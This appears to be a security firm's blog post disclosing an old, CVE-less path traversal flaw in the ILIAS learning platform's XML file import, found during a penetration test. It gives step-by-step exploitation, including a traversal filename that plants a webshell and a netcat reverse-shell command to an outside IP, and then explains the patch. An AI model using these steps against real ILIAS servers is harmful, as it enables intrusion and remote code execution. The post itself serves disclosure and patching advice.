How to use an undocumented ILIAS security vulnerability to gain RCE

ILIAS is a free and open source learning platform which can be used to create and distribute web-based teaching and learning materials. It is often used by universities and companies for e-learning. This blog post describes how we discovered an old ILIAS vulnerability which has no CVE entry, therefore might be overlooked. Vulnerable: all 4.x, <5.0.21, <5.1.17, <5.2.3 versions. Releases 5.3 and newer are not vulnerable! Patched April 2017. Access to file import from XML needed, e.g. by having course administration rights.

Contents

  1. Discovery of the vulnerability
  2. Exploiting the vulnerability
  3. Analyzing the patch of the vulnerability
  4. Conclusion

1. Discovery of the vulnerability

We were tasked to perform a security test on an e-learning platform to identify vulnerabilities and misconfigurations before it was launched and used in production. The utilized e-learning platform is based on ILIAS. During the information gathering phase, we noticed that the platform was running on an outdated version. Therefore, we started researching for known vulnerabilities, but we had no success with that. While browsing through the mailing lists, we came across a particular interesting one from April 2017 (v 5.2.3). It mentioned several security vulnerabilities that were patched.

In this post, the vulnerability was narrowed down to the XML import function and a time (April 2017) and could give us the possibility of copying a file to an arbitrary location on the file system.

Since ILIAS is open source and its source code is hosted on GitHub. We were able to search for the commit that fixes this vulnerability. Knowing the approximate date, the vulnerability was fixed, and the affected file, we quickly found two commits which patched the vulnerability:

Commit 1 on GitHub

Commit 2 on GitHub

Based on this information, we started to develop our own proof of concept.

2. Exploiting the vulnerability

You need an account with some access rights in ILIAS to use the file import function, e.g. course administration. We had these permissions due to another vulnerability unrelated to ILIAS. If you can upload files, you can follow these 6 steps to open a webshell:

  1. Export Files as XML
  2. Unzip archive
  3. Open the export.xml file and change the XML Filename tag to ../../../../../../../../../../../../../var/www/ilias/shell.php - where the path is a web reachable folder
  4. Recreate the archive including the changed XML file
  5. Import the modified zip into ILIAS: 'Add new object' –> 'File' –> 'Option 2: File Import'
  6. Open https://example.com/ilias/shell.php?cmd=nc -e /bin/sh 1.2.3.4 80

3. Analyzing the patch of the vulnerability

How did the ILIAS developer patch this vulnerability that could be abused for arbitrary file upload and even remote code execution?

In April 2017 (v 5.2.3) they added a function called: normalizeRelativePath If a relative path is used, it is possible to access the parent directory by using two dots '..'. This made it possible to breakout out of the current directory into parent directories. With this, we can choose where our shell should be placed after the import. The new function normalizeRelativePath removes these characters.

Before the patch, the path string was handled unfiltered: $this->getImportDirectory()+"/"+"../../../../../../../../../../../../../var/www/example.com/ILIAS/shell.php"

Now this string is filtered with the function normalizeRelativePath and looks like this after the filtering: getImportDirectory()+"/"+"var/www/example.com/example.com/ILIAS/shell.php"

4. Conclusion

Open Source Software is great! It makes good products available to everyone and makes it possible to find bugs early because everyone can have a look. On the other hand, having a version control system that is accessible for everyone, old flaws and mistakes can easily be found and exploited. That is why it is essential to keep your software up to date.

The described vulnerability made it possible to import a shell into ILIAS and control the directory where it is placed by manipulating the XML file. After that, we could execute the shell from remote which resulted in a RCE. This was discovered by searching the mailing list, where they mentioned a bug in the XML import function. Additionally, we showed how to exploit this vulnerability step by step.

Read about other interesting topics on our blog.